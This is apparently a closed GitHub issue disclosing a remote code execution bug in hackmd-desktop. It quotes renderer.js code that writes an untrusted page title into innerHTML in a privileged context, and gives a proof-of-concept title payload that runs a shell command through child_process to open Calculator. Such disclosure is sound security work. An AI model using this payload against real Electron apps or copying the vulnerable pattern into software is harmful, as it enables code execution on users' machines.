Closed 5alt closed 5 years ago
Hi, I found an RCE in hackmd-desktop when viewing an evil note.
In renderer.js:

```js
webview.addEventListener('dom-ready', function () {
  // set webview title (the title comes from whatever page the webview loaded)
  document.querySelector('#navbar-container .title').innerHTML = webview.getTitle()
  document.querySelector('title').innerHTML = webview.getTitle()
})
```
It will render the title of the webview in a privileged context.
If we use a tag or an XSS (https://github.com/hackmdio/codimd/issues/1233) to redirect to an evil page with a payload in the title like this:

```html
<head>
  <title><img src=1 onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title>
</head>
```
It will execute the command in the payload and a calculator will pop up.